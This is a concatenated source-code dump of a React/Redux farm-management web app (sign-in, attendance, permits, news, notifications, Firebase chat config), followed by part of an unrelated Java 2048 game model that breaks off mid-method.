  // Expect a 10-character date like 01-02-1990. TODO confirm the exact
  // format the backend expects.
  if (fieldValue.trim().length !== 10) {
    return `${fieldDOB} must be a valid date (DD-MM-YYYY)`;
  }
  return null;
};
// Lookup table mapping each form field name to its validator; each validator
// returns an error message string or null when the value is valid.
const validate = {
Name: Name => nameValidation('Name', Name),
Email: emailValidation,
Mobile: Mobile => mobileValidation('Mobile', Mobile),
AltMobile: AltMobile => altmobileValidation('AltMobile', AltMobile),
Password: Password => passwordValidation('Password', Password),
Address: Address => addressValidation('Address', Address),
DateOfBirth: DateOfBirth => dobValidation('DateOfBirth', DateOfBirth)
};
// Demo initial form values.
// NOTE(review): neither `validate` nor `initialValues` is exported from this
// module — confirm how they are meant to be consumed.
const initialValues = {
Name: 'Demo',
Email: '<EMAIL>',
Mobile: '1234567890',
AltMobile: '1234567890',
Password: '',
Address: 'abcxyz',
DateOfBirth: '00-00-0000'
};
<file_sep>/src/Constants/dashboardConstant.js
// Redux action types for the dashboard slice.
export const dashboardConstants = {
DASHBOARD_SHOW: 'DASHBOARD_SHOW',
};
import {attendanceConstants} from '../Constants/attendanceConstant'
import {showAttendance, addAttendance, deleteAttendance, updateAttendance} from '../Utility/API/attendanceServices'
// Plain action creators for the attendance slice: each wraps the server
// payload in a typed Redux action.
const attendanceShow = (details) => ({
  type: attendanceConstants.ATTENDANCE_SHOW,
  payload: details,
});

const attendanceUpdate = (details) => ({
  type: attendanceConstants.ATTENDANCE_UPDATE,
  payload: details,
});

const attendanceAdd = (details) => ({
  type: attendanceConstants.ATTENDANCE_NEW,
  payload: details,
});

const attendanceDelete = (details) => ({
  type: attendanceConstants.ATTENDANCE_DELETE,
  payload: details,
});
// Thunk: fetch attendance records for userId and publish them to the store.
function getAttendance(userId) {
  return (dispatch) => {
    showAttendance(userId)
      .then((res) => {
        dispatch(attendanceShow(res.data.details));
      })
      .catch((err) => {
        // Fix: errors were swallowed silently; at least surface them.
        console.error('getAttendance failed', err);
      });
  };
}

// Thunk: persist changes to record `id` and publish the updated list.
// Fix: removed leftover `debugger` statements.
function editAttendance(id, data) {
  return (dispatch) => {
    updateAttendance(id, data)
      .then((res) => {
        dispatch(attendanceUpdate(res.data.details));
      })
      .catch((err) => {
        console.error('editAttendance failed', err);
      });
  };
}

// Thunk: create a new attendance record from obj and publish the updated list.
function newAttendance(obj) {
  return (dispatch) => {
    addAttendance(obj)
      .then((res) => {
        dispatch(attendanceAdd(res.data.details));
      })
      .catch((err) => {
        console.error('newAttendance failed', err);
      });
  };
}

// Thunk: delete the record described by obj and publish the updated list.
function removeAttendance(obj) {
  return (dispatch) => {
    deleteAttendance(obj)
      .then((res) => {
        dispatch(attendanceDelete(res.data.details));
      })
      .catch((err) => {
        console.error('removeAttendance failed', err);
      });
  };
}
export {getAttendance, editAttendance, newAttendance, removeAttendance}<file_sep>/src/container/Users/userpage.js
import React, {Component} from 'react';
class UserPage extends Component {
// constructor(props) {
// super(props)
// };
render() {
// const {category} = this.props
return(
<div>
Welcome
</div>
)
}
}
export default UserPage;<file_sep>/src/ActionCreators/dashboardAction.js
import {dashboardConstants} from '../Constants/dashboardConstant'
import {showDashboard} from '../Utility/API/dashboardServices'
// Action creator: wrap the fetched dashboard payload in a typed action.
function dashboardShow(details) {
  return {
    type: dashboardConstants.DASHBOARD_SHOW,
    payload: details
  };
}

// Thunk: fetch the dashboard data for userId and publish it to the store.
function getDashboard(userId) {
  return (dispatch) => {
    showDashboard(userId)
      .then((res) => {
        dispatch(dashboardShow(res.data.details));
      })
      .catch((err) => {
        // Fix: errors were swallowed silently; at least surface them.
        console.error('getDashboard failed', err);
      });
  };
}
export {getDashboard};<file_sep>/src/container/Header/logo.js
import React from 'react';
// Stateless top-bar component that renders the site logo.
// NOTE(review): the logo anchor points at "index.html", which bypasses the
// SPA router — confirm this is intentional.
const logo = () =>
<header id="top-bar" className="top-bar top-bar--style-1">
<div className="container-fluid">
<div className="row align-items-center justify-content-between no-gutters">
<a className="top-bar__logo site-logo" href="index.html">
<img className="img-fluid site-logo" src="img/farmlogo.png" alt="demo" />
</a>
</div>
</div>
</header>
export default logo;
<file_sep>/src/Reducers/signinReducers.js
import {userConstants} from '../Constants/userConstants';
// Reducer for the sign-in slice. LOGIN_REQUEST/LOGIN_SUCCESS replace the
// whole slice with a flag plus the server message; LOGIN_FAILURE resets it
// to an empty object.
export function authentication(state = {}, action) {
  const { type, message } = action;
  switch (type) {
    case userConstants.LOGIN_REQUEST:
      return { loggingIn: true, message };
    case userConstants.LOGIN_SUCCESS:
      return { loggedIn: true, message };
    case userConstants.LOGIN_FAILURE:
      return {};
    default:
      return state;
  }
}
import React, { Component } from 'react';
import './App.css';
import { Provider } from 'react-redux';
import agrostore from './agrostore';
import SignIn from './container/Login/signin';
import SignUp from './container/Login/signup';
import UserPage from './container/Users/userpage';
import ImgUpload from './container/Query/imgupload';
import Attendance from './container/Attendance/index';
import Query from './container/Query/index';
import Permit from './container/Permit/index';
import News from './container/News/index';
import Notification from './container/Notification/index';
import Activity from './container/Activity/index';
import Dashboard from './container/Dashboard/index';
import Wrapper from './container/Wrapper/wrapper';
import {
BrowserRouter as Router,
Switch,
Route
} from 'react-router-dom';
class App extends Component {
// constructor(props) {
// super(props);
// };
render() {
return (
<Provider store={agrostore}>
<Router>
<Switch>
<Route exact path='/signup'>
<Wrapper><SignUp /></Wrapper>
</Route>
<Route exact path='/signin'>
<Wrapper><SignIn /></Wrapper>
</Route>
<Route exact path='/'>
<Wrapper><SignIn /></Wrapper>
</Route>
<Route exact path='/userpage'>
<Wrapper><UserPage /></Wrapper>
</Route>
<Route exact path='/imgupload'>
<Wrapper><ImgUpload /></Wrapper>
</Route>
<Route exact path='/attendance'>
<Wrapper><Attendance /></Wrapper>
</Route>
<Route exact path='/query'>
<Wrapper><Query /></Wrapper>
</Route>
<Route exact path='/permit'>
<Wrapper><Permit /></Wrapper>
</Route>
<Route exact path='/news'>
<Wrapper><News /></Wrapper>
</Route>
<Route exact path='/notification'>
<Wrapper><Notification /></Wrapper>
</Route>
<Route exact path='/activity'>
<Wrapper><Activity /></Wrapper>
</Route>
<Route exact path='/dashboard'>
<Wrapper><Dashboard /></Wrapper>
</Route>
</Switch>
</Router>
</Provider>
);
};
};
export default App;
<file_sep>/src/container/Login/signin.js
import React, { Component } from 'react';
import {connect} from 'react-redux';
import {userActions} from '../../ActionCreators/userActions';
import {history} from '../../history';
class SignIn extends Component {
constructor(props) {
super(props)
// for demo, Email: <EMAIL> and password: <PASSWORD>
this.state = {
Email: "",
Password: "",
submitted: false
};
};
onButtonClick = () => {
history.push('/signup')
};
onhandleChange = (event) => {
const {value, name} = event.target;
this.setState({
[name]: value
});
};
onhandleButton = (e) => {
this.setState({submitted: true});
const { Email, Password } = this.state;
const user = { Email, Password }
if (Email && Password) {
this.props.Login_In(user);
};
// history.push('/userpage')
};
render() {
const {loggingIn} = this.props;
const {Email, Password, submitted} = this.state;
return (
<div className="section">
<div className="container">
<div className="row">
<div className="col-12 col-md-6 col-lg-5 col-xl-4 offset-lg-1 offset-xl-2">
<h2>Sign <span>in</span></h2>
<form className="auth-form" action="#">
<div className={"input-wrp" + (submitted && !Email ? 'has-error' : '')}>
<input className="textfield" type="text" name='Email' value={Email} onChange={this.onhandleChange}
placeholder="<EMAIL>" />
{submitted && !Email && <div className="help-block">Email is required</div>}
</div>
<div className={"input-wrp" + (submitted && !Password ? 'has-error' : '')}>
<input className="textfield" type="text" name='Password' value={Password} onChange={this.onhandleChange}
placeholder="<PASSWORD>" />
{submitted && !Password && <div className="help-block">Password is required</div>}
</div>
<div className="row align-items-center justify-content-between">
<div className="col-auto">
<label className="checkfield align-bottom">
<input type="checkbox" checked="" />
<i></i>
Remember me
</label>
</div>
<div className="col-auto">
<a className="link-forgot" href="#"> forgot password?</a>
</div>
</div>
<div className="d-table mt-8">
<div className="d-table-cell align-middle">
<button className="custom-btn custom-btn--medium custom-btn--style-1" type="submit" role="button" onClick={this.onhandleButton}>LOGIN</button>
{loggingIn}
</div>
<div className="d-table-cell align-middle">
<a><button className="link-to" href="#" onClick={this.onButtonClick}>SIGN UP</button></a>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
)
}
};
// Expose the login-progress flag from the user slice to the component.
const mapState = (state) => ({
    loggingIn: state.userReducers.loggingIn,
});

// Action creators auto-bound to dispatch by connect().
const createActions = {
    Login_In: userActions.Login_In,
};

const connectSignIn = connect(mapState, createActions)(SignIn);
export default connectSignIn;<file_sep>/src/container/Query/imgupload.js
import React, { Component } from 'react';
import axios from 'axios';
class ImgUpload extends Component {
constructor(props) {
super(props)
this.state = {
selectedFile: null,
imagePreviewURL: "",
imagePreview: null,
details: ""
};
};
onHandleSubmit = (e) => {
console.log('handle uploading', this.state.selectedFile, this.state.details)
};
fileSelected = (e) => {
this.setState({
selectedFile: e.target.files
})
};
fileUpload = () => {
debugger
let fd = new FormData();
fd.append('image', this.state.selectedFile);
fd.append('name', 'sample');
axios.post('http://logicalloop.com/farmeasy/api/User/query/new',
{fd}
)
.then(
res => {
debugger
console.log(res.data);
}
)
.catch(
error => {
debugger
console.log(error);
}
)
};
onHandleChange = (event) => {
const { name, value } = event.target;
this.setState({
[name]: value
})
};
render() {
let { imagePreviewURL, imagePreview, details } = this.state;
if (imagePreviewURL) {
imagePreview = (<img src={imagePreviewURL} />);
}
else {
imagePreview = (<div className="previewText">
Please select an image for Preview
</div>)
};
return (
<div className="previewComponent">
<form onSubmit={this.onHandleSubmit}>
<input className="fileInput"
// style={{display: "none"}}
type="file" multiple name='selectedFile'
onChange={this.fileSelected} />
{/* ref={fileInput => this.fileInput = fileInput} */}
{/* <tr>
<button
onClick={() => this.fileInput.click()}>
Pick File
</button>
</tr> */}
<tr>
<button className="submitButton"
type="submit"
onClick={this.fileUpload}>
Upload
</button>
</tr>
<input className="textfield" type="text" name='details' value={details} onChange={this.onHandleChange}
placeholder="Description of selected image*" />
</form>
<div className="imagePreview">
{imagePreview}
</div>
</div>
)
};
};
export default ImgUpload;
<file_sep>/src/container/Dashboard/index.js
import React, { Component } from "react"
import { connect } from 'react-redux'
import {getDashboard} from '../../ActionCreators/dashboardAction'
class Dashboard extends Component {
constructor(props) {
super(props)
this.state = {};
};
componentDidMount() {
this.props.getDashboard(1)
};
handleShowDashboard = () => {
debugger
this.props.getDashboard(1)
};
render() {
console.log(this.props.details)
return (
<div>
dsfdsfs
<button onClick={() => {
this.handleShowDashboard()
}}>Display dashboard</button>
</div>
);
};
};
// Map the dashboard slice of the store onto the component's props.
const mapStateToProps = ({ dashboardReducers }) => ({
    details: dashboardReducers.details,
});

// Object shorthand: connect() wraps getDashboard in dispatch.
const mapDispatchToProps = { getDashboard };
export default connect(mapStateToProps, mapDispatchToProps)(Dashboard);<file_sep>/src/Constants/notificationConstant.js
// Redux action-type constants for the notification CRUD flow
// (consumed by notificationAction.js and notificationReducer.js).
export const notificationConstants = {
    NOTIFICATION_SHOW: 'NOTIFICATION_SHOW',
    NOTIFICATION_NEW: 'NOTIFICATION_NEW',
    NOTIFICATION_DELETE: 'NOTIFICATION_DELETE',
    NOTIFICATION_UPDATE: 'NOTIFICATION_UPDATE'
};<file_sep>/src/ActionCreators/notificationAction.js
import {notificationConstants} from '../Constants/notificationConstant'
import {showNotification, addNotification, deleteNotification, updateNotification} from '../Utility/API/notificationServices'
// Build a plain { type, payload } action. All four notification actions
// share this shape, so they are generated from a single factory.
const makeNotificationAction = (type) => (notification) => ({
    type,
    payload: notification,
});

const notificationShow = makeNotificationAction(notificationConstants.NOTIFICATION_SHOW);
const notificationUpdate = makeNotificationAction(notificationConstants.NOTIFICATION_UPDATE);
const notificationAdd = makeNotificationAction(notificationConstants.NOTIFICATION_NEW);
const notificationDelete = makeNotificationAction(notificationConstants.NOTIFICATION_DELETE);
/**
 * Thunk: fetch the notifications for `userId` and publish them to the store.
 * Failures are logged instead of being silently swallowed, and the leftover
 * `debugger` statements were removed.
 */
function getNotification(userId) {
    return dispatch => {
        showNotification(userId)
            .then(res => {
                dispatch(notificationShow(res.data.notification))
            })
            .catch(err => {
                console.error('getNotification failed', err)
            })
    };
};
/** Thunk: update notification `id` with `data`, then refresh the store. */
function editNotification(id, data) {
    return dispatch => {
        updateNotification(id, data)
            .then(res => {
                // The previous version declared a `data` const here, shadowing
                // the `data` argument; the response is used directly instead.
                dispatch(notificationUpdate(res.data.notification))
            })
            .catch(err => {
                console.error('editNotification failed', err)
            })
    };
};
/** Thunk: create a notification and publish the server's response. */
function newNotification(obj) {
    return dispatch => {
        addNotification(obj)
            .then(res => {
                dispatch(notificationAdd(res.data.notification))
            })
            .catch(err => {
                console.error('newNotification failed', err)
            })
    };
};
/** Thunk: delete a notification and publish the server's response. */
function removeNotification(obj) {
    return dispatch => {
        deleteNotification(obj)
            .then(res => {
                dispatch(notificationDelete(res.data.notification))
            })
            .catch(err => {
                console.error('removeNotification failed', err)
            })
    };
};
export {getNotification, editNotification, newNotification, removeNotification}<file_sep>/src/Reducers/notificationReducer.js
import {notificationConstants} from '../Constants/notificationConstant';
const initialState = {
notification: []
};
export const notificationReducers = (state=initialState, action) => {
switch (action.type) {
case notificationConstants.NOTIFICATION_SHOW:
debugger
return {
...state,
notification: action.payload
};
case notificationConstants.NOTIFICATION_UPDATE:
debugger
return {
...state,
notification: action.payload
}
case notificationConstants.NOTIFICATION_NEW:
debugger
return {
...state,
notification: action.payload
}
case notificationConstants.NOTIFICATION_DELETE:
debugger
return {
...state,
notification: action.payload
}
default:
return state
};
};<file_sep>/src/Utility/API/newsServices.js
import {HttpClient} from '../httpClient'
import urlMapper from '../urlMapper'
// Each helper returns the HttpClient promise directly. Wrapping an existing
// promise in `new Promise((resolve, reject) => ...)` (the old pattern) is the
// promise-constructor anti-pattern: it added nothing but pass-through
// resolve/reject calls and stray `debugger` statements.

/** GET the news feed for user `id`. */
const showNews = (id) => HttpClient.get(`${urlMapper.getNews}${id}`);

/** POST a new news item. */
const addNews = (data) => HttpClient.post(`${urlMapper.addNews}`, data);

/** DELETE the news item with the given `id`. */
const deleteNews = (id) => HttpClient.delete(`${urlMapper.deleteNews}${id}`);

/** POST an update for news item `id`. */
const updateNews = (id, data) => HttpClient.post(`${urlMapper.updateNews}${id}`, data);
export {showNews, addNews, deleteNews, updateNews};<file_sep>/src/Constants/queryConstant.js
// Redux action-type constants for the query CRUD flow.
export const queryConstants = {
    QUERY_SHOW: 'QUERY_SHOW',
    QUERY_NEW: 'QUERY_NEW',
    QUERY_DELETE: 'QUERY_DELETE',
    QUERY_UPDATE: 'QUERY_UPDATE'
};<file_sep>/src/ActionCreators/userActions.js
import {userConstants} from '../Constants/userConstants';
import {alertActions} from '../ActionCreators/alertActions';
import axios from 'axios';
// Public login API consumed by the SignIn container via createActions.
// Login_Up (sign-up) is implemented below but not exported yet.
export const userActions = {
    Login_In,
    // Login_Up
};
/**
 * Thunk: authenticate the user against the farmeasy API.
 * `user` is the object dispatched by SignIn: { Email, Password }.
 * The previous version read `user.usrname` (a field that does not exist on
 * that object) and contained an invalid placeholder token, so the request
 * was always sent with undefined credentials; debuggers and the large block
 * of commented-out scaffolding were removed.
 */
function Login_In(user) {
    return dispatch => {
        let cred = {
            email: user.Email,
            password: user.Password
        };
        // NOTE(review): this nests the credentials under a "cred" key in the
        // request body — confirm the API does not expect them at the top level.
        axios.post("http://logicalloop.com/farmeasy/api/login",
            {cred}
        )
        .then(
            res => {
                console.log(res.data);
                // TODO: dispatch LOGIN_SUCCESS / alertActions.success here.
            }
        )
        .catch(
            error => {
                console.log(error);
                // TODO: dispatch LOGIN_FAILURE / alertActions.error here.
            }
        )
    };
};
// Thunk: register a new user. Defined but not yet exported via userActions
// (see the commented-out entry in the export object above).
function Login_Up(user) {
    return dispatch => {
        // dispatch(request(user));
        axios.post("https://logicalloop.com/farmeasy/api/signup",
            {user}
        )
        .then(
            res=> {
                console.log(res.data);
            }
        )
        .catch(
            res => {
                console.log(res.data);
            }
        )
    };
    // Scaffolding for proper request/success/failure dispatching, kept for
    // when the signup flow is wired into the reducers:
    // .then(
    //     user => {
    //         dispatch(success(user));
    //         dispatch(alertActions.success('Registration successful'))
    //     })
    // .catch(
    //     error => {
    //         dispatch(failure(error));
    //         dispatch(alertActions.error(error));
    //     })
    // };
    // function request(user) {
    //     return {
    //         type: userConstants.REGISTER_REQUEST, user
    //     };
    // };
    // function success(user) {
    //     return {
    //         type: userConstants.REGISTER_SUCCESS, user
    //     };
    // };
    // function failure(user) {
    //     return {
    //         type: userConstants.REGISTER_FAILURE, user
    //     };
    // };
};<file_sep>/src/Utility/API/activityServices.js
import {HttpClient} from '../httpClient'
import urlMapper from '../urlMapper'
// Each helper returns the HttpClient promise directly. The old code wrapped
// an existing promise in `new Promise(...)` (promise-constructor
// anti-pattern) and left `debugger` statements in every branch.

/** GET the activity feed for user `id`. */
const showActivity = (id) => HttpClient.get(`${urlMapper.getActivity}${id}`);

/** POST a new activity. */
const addActivity = (data) => HttpClient.post(`${urlMapper.addActivity}`, data);

/** DELETE the activity with the given `id`. */
const deleteActivity = (id) => HttpClient.delete(`${urlMapper.deleteActivity}${id}`);

/** POST an update for activity `id`. */
const updateActivity = (id, data) => HttpClient.post(`${urlMapper.updateActivity}${id}`, data);
export {showActivity, addActivity, deleteActivity, updateActivity};<file_sep>/src/ActionCreators/permitAction.js
import {permitConstants} from '../Constants/permitConstant'
import {showPermit, addPermit, deletePermit, updatePermit} from '../Utility/API/permitServices'
// Build a plain { type, payload } action. All four permit actions share
// this shape, so they are generated from a single factory.
const makePermitAction = (type) => (permit) => ({
    type,
    payload: permit,
});

const permitShow = makePermitAction(permitConstants.PERMIT_SHOW);
const permitUpdate = makePermitAction(permitConstants.PERMIT_UPDATE);
const permitAdd = makePermitAction(permitConstants.PERMIT_NEW);
const permitDelete = makePermitAction(permitConstants.PERMIT_DELETE);
/**
 * Thunk: fetch the permits for `userId` and publish them to the store.
 * Failures are logged instead of silently swallowed; `debugger`s removed.
 */
function getPermit(userId) {
    return dispatch => {
        showPermit(userId)
            .then(res => {
                dispatch(permitShow(res.data.permit))
            })
            .catch(err => {
                console.error('getPermit failed', err)
            })
    };
};
/** Thunk: update permit `id` with `data`, then refresh the store. */
function editPermit(id, data) {
    return dispatch => {
        updatePermit(id, data)
            .then(res => {
                // The previous version shadowed the `data` argument here.
                dispatch(permitUpdate(res.data.permit))
            })
            .catch(err => {
                console.error('editPermit failed', err)
            })
    };
};
/** Thunk: create a permit and publish the server's response. */
function newPermit(obj) {
    return dispatch => {
        addPermit(obj)
            .then(res => {
                dispatch(permitAdd(res.data.permit))
            })
            .catch(err => {
                console.error('newPermit failed', err)
            })
    };
};
/** Thunk: delete a permit and publish the server's response. */
function removePermit(obj) {
    return dispatch => {
        deletePermit(obj)
            .then(res => {
                dispatch(permitDelete(res.data.permit))
            })
            .catch(err => {
                console.error('removePermit failed', err)
            })
    };
};
export {getPermit, editPermit, newPermit, removePermit}<file_sep>/src/Reducers/dashboardReducer.js
import {dashboardConstants} from '../Constants/dashboardConstant'
const initialState = {
details: []
};
export const dashboardReducers = (state=initialState, action) => {
switch (action.type) {
case dashboardConstants.DASHBOARD_SHOW:
debugger
return {
...state,
details: action.payload
};
default:
return state
};
};<file_sep>/src/Utility/API/permitServices.js
import {HttpClient} from '../httpClient'
import urlMapper from '../urlMapper'
// Each helper returns the HttpClient promise directly. The old code wrapped
// an existing promise in `new Promise(...)` (promise-constructor
// anti-pattern) and left `debugger` statements in every branch.

/** GET the permits for user `id`. */
const showPermit = (id) => HttpClient.get(`${urlMapper.getPermit}${id}`);

/** POST a new permit. */
const addPermit = (data) => HttpClient.post(`${urlMapper.addPermit}`, data);

/** DELETE the permit with the given `id`. */
const deletePermit = (id) => HttpClient.delete(`${urlMapper.deletePermit}${id}`);

/** POST an update for permit `id`. */
const updatePermit = (id, data) => HttpClient.post(`${urlMapper.updatePermit}${id}`, data);
export {showPermit, addPermit, deletePermit, updatePermit};<file_sep>/src/container/News/index.js
import React, { Component } from "react";
import { connect } from 'react-redux';
import { getNews, editNews, newNews, removeNews } from '../../ActionCreators/newsAction'
class News extends Component {
constructor(props) {
super(props);
this.state = {
"news_type": "abc",
"title": "abc",
"description": "demo",
"datetime": "2020-08-04 11:34:21",
"isActive": "1"
};
};
componentDidMount() {
this.props.getNews(5)
};
handleShowNews = () => {
// const obj = this.state;
debugger
this.props.getNews(5)
};
handleUpdateNews = () => {
const obj = this.state;
debugger
this.props.editNews(5, obj)
};
handleNewNews = () => {
const obj = this.state;
debugger
this.props.newNews(obj)
};
handleDeleteNews = () => {
const obj = this.state;
debugger
this.props.removeNews(obj)
};
render() {
console.log(this.props.news)
return (
<div>
dsfdsfs
<button onClick={() => {
this.handleShowNews()
}}>Display news</button>
<button onClick={() => {
this.handleUpdateNews()
}}>Update news</button>
<button onClick={() => {
this.handleNewNews()
}}>New news</button>
<button onClick={() => {
this.handleDeleteNews()
}}>Delete news</button>
</div>
);
};
};
// Expose the news list from the store.
const mapStateToProps = ({ newsReducers }) => ({
    news: newsReducers.news,
});

// All four thunks bound to dispatch via the object shorthand.
const mapDispatchToProps = { getNews, editNews, newNews, removeNews };

export default connect(mapStateToProps, mapDispatchToProps)(News);
<file_sep>/src/Reducers/newsReducer.js
import {newsConstants} from '../Constants/newsConstant';
const initialState = {
news: []
};
export const newsReducers = (state=initialState, action) => {
switch (action.type) {
case newsConstants.NEWS_SHOW:
debugger
return {
...state,
news: action.payload
};
case newsConstants.NEWS_UPDATE:
debugger
return {
...state,
news: action.payload
}
case newsConstants.NEWS_NEW:
debugger
return {
...state,
news: action.payload
}
case newsConstants.NEWS_DELETE:
debugger
return {
...state,
news: action.payload
}
default:
return state
};
};<file_sep>/src/container/ChatBox/chatservices/firebase.js
import firebase from "firebase/app";
import "firebase/auth";
import "firebase/database";
// Firebase project configuration for the chat demo. These values are
// client-side identifiers rather than server secrets; the apiKey has been
// redacted in this dump.
var firebaseConfig = {
    apiKey: "<KEY>",
    authDomain: "myfarmeasychatdemo.firebaseapp.com",
    databaseURL: "https://myfarmeasychatdemo.firebaseio.com",
    projectId: "myfarmeasychatdemo",
    storageBucket: "myfarmeasychatdemo.appspot.com",
    messagingSenderId: "428961958095",
    appId: "1:428961958095:web:404056fa92692dbf274fba",
    measurementId: "G-ZQ51X904J7"
};
firebase.initializeApp(firebaseConfig);
// firebase.analytics();
// NOTE(review): `auth` exports the auth *namespace* (callers must invoke
// firebase.auth() themselves), while `db` is an initialised database
// instance — confirm this asymmetry is intended.
export const auth = firebase.auth;
export const db = firebase.database();
"JavaScript"
] | 32 | JavaScript | inv-Karan/argo_ll_react | 0f9b1e2e3006b771d42af2efb6e05a3ba8ff16e3 | 26f0510a57420d2dc141d1b1cac146aa9ce80db1 |
refs/heads/master | <repo_name>justignatoff/2048<file_sep>/src/Model.java
import java.util.*;
/**
 * Game model for 2048: holds the 4x4 board, the score, and the undo history,
 * and implements the slide/merge rules plus simple random and greedy
 * auto-play strategies.
 */
public class Model {
    private static final int FIELD_WIDTH = 4;
    private Tile[][] gameTiles;
    // Guards against saving the same board twice for a single move.
    private boolean isSaveNeeded = true;
    int score = 0;
    // Largest tile value ever produced by a merge.
    int maxTile = 0;
    // Undo history: board snapshots and the matching scores.
    private Stack<Tile[][]> previousStates = new Stack<>();
    private Stack<Integer> previousScores = new Stack<>();

    public Model() {
        resetGameTiles();
    }

    /** Push a deep copy of {@code tiles} and the current score onto the undo stacks. */
    private void saveState(Tile[][] tiles) {
        Tile[][] tmpGame = new Tile[FIELD_WIDTH][FIELD_WIDTH];
        for (int i = 0; i < FIELD_WIDTH; i++)
            for (int j = 0; j < FIELD_WIDTH; j++)
                tmpGame[i][j] = new Tile(tiles[i][j].value);
        previousStates.push(tmpGame);
        previousScores.push(score);
        isSaveNeeded = false;
    }

    /**
     * Restore the previous board and score. Both stacks are popped together
     * (the old nested-if version could leave them out of sync when only one
     * stack was non-empty), and the redundant casts on the typed stacks are gone.
     */
    public void rollback() {
        if (!previousStates.isEmpty() && !previousScores.isEmpty()) {
            gameTiles = previousStates.pop();
            score = previousScores.pop();
        }
    }

    public Tile[][] getGameTiles() {
        return gameTiles;
    }

    /** True when a move is still possible: an empty cell or two equal neighbours exist. */
    public boolean canMove() {
        if (!getEmptyTiles().isEmpty()) return true;
        // Equal horizontal neighbours.
        for (int i = 0; i < FIELD_WIDTH; i++) {
            for (int j = 0; j < FIELD_WIDTH - 1; j++) {
                if (gameTiles[i][j].value == gameTiles[i][j + 1].value) return true;
            }
        }
        // Equal vertical neighbours.
        for (int i = 0; i < FIELD_WIDTH; i++) {
            for (int j = 0; j < FIELD_WIDTH - 1; j++) {
                if (gameTiles[j][i].value == gameTiles[j + 1][i].value) return true;
            }
        }
        return false;
    }

    /** Place a new tile (2 with 90% probability, otherwise 4) on a random empty cell. */
    public void addTile() {
        List<Tile> list = getEmptyTiles();
        if (!list.isEmpty()) {
            list.get((int) (list.size() * Math.random())).value = (Math.random() < 0.9 ? 2 : 4);
        }
    }

    /** Collect all tiles whose value is 0. */
    private List<Tile> getEmptyTiles() {
        List<Tile> emptyList = new ArrayList<>();
        for (int i = 0; i < gameTiles.length; i++)
            for (int j = 0; j < gameTiles.length; j++)
                if (gameTiles[i][j].value == 0)
                    emptyList.add(gameTiles[i][j]);
        return emptyList;
    }

    /** Reset the board to all-empty tiles and spawn the two starting tiles. */
    void resetGameTiles() {
        gameTiles = new Tile[FIELD_WIDTH][FIELD_WIDTH];
        for (int i = 0; i < gameTiles.length; i++)
            for (int j = 0; j < gameTiles.length; j++)
                gameTiles[i][j] = new Tile();
        addTile();
        addTile();
    }

    /**
     * Slide all non-empty tiles of one row to the left, filling the gaps.
     * Returns true when at least one tile moved.
     */
    private boolean compressTiles(Tile[] tiles) {
        boolean anyChange = false;
        for (int i = 0; i < tiles.length; i++) {
            if (tiles[i].value == 0) {
                // Pull the next non-empty tile into this slot.
                for (int j = i + 1; j < tiles.length; j++) {
                    if (tiles[j].value != 0) {
                        tiles[i].value = tiles[j].value;
                        tiles[j].value = 0;
                        anyChange = true;
                        break;
                    }
                }
            }
        }
        return anyChange;
    }

    /**
     * Merge equal adjacent tiles of one row (leftwards), updating score and
     * maxTile. Returns true when at least one merge happened.
     * The previous version deliberately triggered an
     * ArrayIndexOutOfBoundsException on the last element and used
     * catch-and-continue as control flow; stopping the loop one cell early
     * is exactly equivalent and needs no exception handling.
     */
    private boolean mergeTiles(Tile[] tiles) {
        boolean change = false;
        for (int i = 0; i < tiles.length - 1; i++) {
            if (tiles[i].value > 0 && tiles[i].value == tiles[i + 1].value) {
                tiles[i].value += tiles[i + 1].value;
                // If the merge produced a new record tile, remember it.
                if (tiles[i].value > maxTile) {
                    maxTile = tiles[i].value;
                }
                // The score grows by the weight of the tile created by the merge.
                score += tiles[i].value;
                change = true;
                // Shift everything after the merged pair one cell left.
                for (int j = i + 1; j < tiles.length; j++) {
                    if (j != tiles.length - 1) {
                        tiles[j].value = tiles[j + 1].value;
                    } else tiles[j].value = 0;
                }
            }
        }
        return change;
    }

    /** Move left: compress + merge each row; spawn a tile when the board changed. */
    public void left() {
        boolean isChange = false;
        if (isSaveNeeded)
            saveState(gameTiles);
        for (int i = 0; i < gameTiles.length; i++) {
            boolean compress = compressTiles(gameTiles[i]);
            boolean merge = mergeTiles(gameTiles[i]);
            if (compress | merge)
                isChange = true;
        }
        if (isChange)
            addTile();
        isSaveNeeded = true;
    }

    /** Move up: rotate so that "up" becomes "left", move, rotate back. */
    public void up() {
        saveState(gameTiles);
        rotate90();
        left();
        rotate90();
        rotate90();
        rotate90();
    }

    /** Move right: two rotations map "right" onto "left". */
    public void right() {
        saveState(gameTiles);
        rotate90();
        rotate90();
        left();
        rotate90();
        rotate90();
    }

    /** Move down: three rotations map "down" onto "left". */
    public void down() {
        saveState(gameTiles);
        rotate90();
        rotate90();
        rotate90();
        left();
        rotate90();
    }

    /** Rotate the board 90 degrees (counter-clockwise mapping used by the moves above). */
    private void rotate90() {
        Tile[][] rotMat = new Tile[FIELD_WIDTH][FIELD_WIDTH];
        for (int rw = 0; rw < gameTiles.length; rw++) {
            for (int cl = 0; cl < gameTiles.length; cl++) {
                rotMat[gameTiles.length - 1 - cl][rw] = gameTiles[rw][cl];
            }
        }
        gameTiles = rotMat;
    }

    /** Perform one uniformly random move (baseline bot). */
    public void randomMove() {
        int n = ((int) (Math.random() * 100)) % 4;
        switch (n) {
            case 0: left(); break;
            case 1: right(); break;
            case 2: up(); break;
            case 3: down(); break;
        }
    }

    /** Greedy bot: try all four moves and perform the most efficient one. */
    public void autoMove() {
        PriorityQueue<MoveEfficiency> queue = new PriorityQueue<>(4, Collections.reverseOrder());
        queue.add(getMoveEfficiency(() -> right()));
        queue.add(getMoveEfficiency(() -> up()));
        queue.add(getMoveEfficiency(() -> down()));
        queue.add(getMoveEfficiency(() -> left()));
        queue.peek().getMove().move();
    }

    /** Compare the current board with the last saved snapshot. */
    public boolean hasBoardChanged() {
        Tile[][] lastBoard = previousStates.peek();
        for (int i = 0; i < FIELD_WIDTH; i++) {
            for (int j = 0; j < FIELD_WIDTH; j++) {
                if (lastBoard[i][j].value != gameTiles[i][j].value) {
                    return true;
                }
            }
        }
        return false;
    }

    /**
     * Evaluate {@code move}: perform it, score it by empty-tile count and
     * total score, then roll the board back. Moves that change nothing get
     * an efficiency of (-1, 0).
     */
    public MoveEfficiency getMoveEfficiency(Move move) {
        move.move();
        if (!hasBoardChanged()) {
            rollback();
            return new MoveEfficiency(-1, 0, move);
        }
        int emptyTilesCount = getEmptyTiles().size();
